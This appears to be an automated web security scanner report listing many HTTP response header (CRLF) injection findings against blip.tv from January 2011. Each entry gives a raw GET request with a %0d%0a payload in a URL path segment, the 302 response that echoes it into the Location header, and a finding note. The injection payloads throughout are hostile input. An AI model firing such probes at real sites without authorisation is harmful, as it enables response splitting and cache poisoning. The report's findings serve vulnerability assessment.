GET /file/c8150%0d%0aa8ef03bb86d/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/c8150 a8ef03bb86d/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 Content-Type: text/html; charset=iso-8859-1 Content-Length: 355 Date: Thu, 20 Jan 2011 00:38:15 GMT X-Varnish: 1498215037 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/c8150 a8ef03bb86d/VZW- ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 6c82d%0d%0a93977621bdf was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/6c82d%0d%0a93977621bdf HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/6c82d 93977621bdf Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:15 GMT X-Varnish: 1274880099 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/6c82d 93977621bdf" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload b735a%0d%0a4b73dce7fd6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /b735a%0d%0a4b73dce7fd6/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/b735a 4b73dce7fd6/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 339 Date: Thu, 20 Jan 2011 00:38:14 GMT X-Varnish: 1025265053 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/b735a 4b73dce7fd6/get/VZW-O ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload c53d4%0d%0aaced57da6fc was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/c53d4%0d%0aaced57da6fc/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/c53d4 aced57da6fc/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 340 Date: Thu, 20 Jan 2011 00:38:15 GMT X-Varnish: 1248903439 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/c53d4 aced57da6fc/VZW- ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload fff71%0d%0a9caf11d87e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/fff71%0d%0a9caf11d87e HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/fff71 9caf11d87e Content-Type: text/html; charset=iso-8859-1 Content-Length: 286 Date: Thu, 20 Jan 2011 00:38:15 GMT X-Varnish: 1025265146 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/fff71 9caf11d87e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 1cec9%0d%0aaea8b0a57c0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1cec9%0d%0aaea8b0a57c0/post/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/1cec9 aea8b0a57c0/post/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 284 Date: Thu, 20 Jan 2011 00:38:29 GMT X-Varnish: 1498217007 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/1cec9 aea8b0a57c0/post/">he ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload b447b%0d%0aae2ca8874c8 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/b447b%0d%0aae2ca8874c8/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/b447b ae2ca8874c8/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 299 Date: Thu, 20 Jan 2011 00:38:29 GMT X-Varnish: 1025267076 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/b447b ae2ca8874c8/">he ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 6b1a1%0d%0aafeb6bf68fb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6b1a1%0d%0aafeb6bf68fb/view/4639878 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/6b1a1 afeb6bf68fb/view/4639878 Content-Type: text/html; charset=iso-8859-1 Content-Length: 291 Date: Thu, 20 Jan 2011 00:38:30 GMT X-Varnish: 1248905621 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/6b1a1 afeb6bf68fb/view/4639 ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 5e398%0d%0afe6869b45b4 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/5e398%0d%0afe6869b45b4/4639878 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/5e398 fe6869b45b4/4639878 Content-Type: text/html; charset=iso-8859-1 Content-Length: 291 Date: Thu, 20 Jan 2011 00:38:30 GMT X-Varnish: 1025267239 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/5e398 fe6869b45b4/4639 ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload d28f4%0d%0adfc23e7d40b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/view/d28f4%0d%0adfc23e7d40b HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/view/d28f4 dfc23e7d40b Content-Type: text/html; charset=iso-8859-1 Content-Length: 288 Date: Thu, 20 Jan 2011 00:38:30 GMT X-Varnish: 1324527842 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/view/d28f4 dfc23e7d40b ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload a5c5e%0d%0aecfd3e1b2e1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /a5c5e%0d%0aecfd3e1b2e1/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/a5c5e ecfd3e1b2e1/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 294 Date: Thu, 20 Jan 2011 00:39:03 GMT X-Varnish: 1324533224 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/a5c5e ecfd3e1b2e1/">here</a ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload d9557%0d%0a1ccc7956757 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /d9557%0d%0a1ccc7956757 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/d9557 1ccc7956757 Content-Type: text/html; charset=iso-8859-1 Content-Length: 293 Date: Thu, 20 Jan 2011 00:38:50 GMT X-Varnish: 344230656 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/d9557 1ccc7956757">here</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 5e893%0d%0afef1a092f91 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5e893%0d%0afef1a092f91/AYG43E4C HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/5e893 fef1a092f91/AYG43E4C Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:45 GMT X-Varnish: 1025269683 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/5e893 fef1a092f91/AYG43E4C" ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 8ae4b%0d%0aef261fee625 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/8ae4b%0d%0aef261fee625 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/8ae4b ef261fee625 Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:45 GMT X-Varnish: 2146048296 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/8ae4b ef261fee625">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 9d9ed%0d%0a1d0190b6bfe was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9d9ed%0d%0a1d0190b6bfe/AYG43E4C/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/9d9ed 1d0190b6bfe/AYG43E4C/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 288 Date: Thu, 20 Jan 2011 00:38:45 GMT X-Varnish: 1498219656 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/9d9ed 1d0190b6bfe/AYG43E4C/ ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 9b62f%0d%0aafb7f205a9b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/9b62f%0d%0aafb7f205a9b/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/9b62f afb7f205a9b/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 284 Date: Thu, 20 Jan 2011 00:38:46 GMT X-Varnish: 1498219708 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/9b62f afb7f205a9b/">he ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload bef89%0d%0a78a00608a45 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /bef89%0d%0a78a00608a45/AYKO2zcC HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/bef89 78a00608a45/AYKO2zcC Content-Type: text/html; charset=iso-8859-1 Content-Length: 302 Date: Thu, 20 Jan 2011 00:38:48 GMT X-Varnish: 1324530645 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/bef89 78a00608a45/AYKO2zcC" ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload faa16%0d%0ad4d07c4ea2a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/faa16%0d%0ad4d07c4ea2a HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/faa16 d4d07c4ea2a Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:48 GMT X-Varnish: 344230345 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/faa16 d4d07c4ea2a">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload ab7a4%0d%0a628a1e29106 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /ab7a4%0d%0a628a1e29106/AYKO2zcC/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/ab7a4 628a1e29106/AYKO2zcC/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 288 Date: Thu, 20 Jan 2011 00:38:48 GMT X-Varnish: 1324530741 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/ab7a4 628a1e29106/AYKO2zcC/ ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload e6eea%0d%0a0a912b6859e was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/e6eea%0d%0a0a912b6859e/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/e6eea 0a912b6859e/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 284 Date: Thu, 20 Jan 2011 00:38:49 GMT X-Varnish: 1248908777 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/e6eea 0a912b6859e/">he ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload b6315%0d%0a813561f09f7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /b6315%0d%0a813561f09f7/AYKY+jQC HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/b6315 813561f09f7/AYKY+jQC Content-Type: text/html; charset=iso-8859-1 Content-Length: 302 Date: Thu, 20 Jan 2011 00:38:43 GMT X-Varnish: 1248907746 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/b6315 813561f09f7/AYKY+jQC" ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload bc569%0d%0ad3d84c47ba8 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/bc569%0d%0ad3d84c47ba8 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/bc569 d3d84c47ba8 Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:44 GMT X-Varnish: 1025269553 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/bc569 d3d84c47ba8">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 23c99%0d%0a090959020ae was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /23c99%0d%0a090959020ae/AYKY+jQC/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/23c99 090959020ae/AYKY+jQC/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 303 Date: Thu, 20 Jan 2011 00:38:43 GMT X-Varnish: 1324529866 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/23c99 090959020ae/AYKY+jQC/ ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 2ca83%0d%0a128c7cc92be was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/2ca83%0d%0a128c7cc92be/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/2ca83 128c7cc92be/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 284 Date: Thu, 20 Jan 2011 00:38:44 GMT X-Varnish: 344229583 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/2ca83 128c7cc92be/">he ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload eb535%0d%0a9e9b4f6a7b4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /eb535%0d%0a9e9b4f6a7b4/AYKY31UC HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/eb535 9e9b4f6a7b4/AYKY31UC Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:45 GMT X-Varnish: 2146048179 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/eb535 9e9b4f6a7b4/AYKY31UC" ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload d91e6%0d%0ae9cbf33725c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
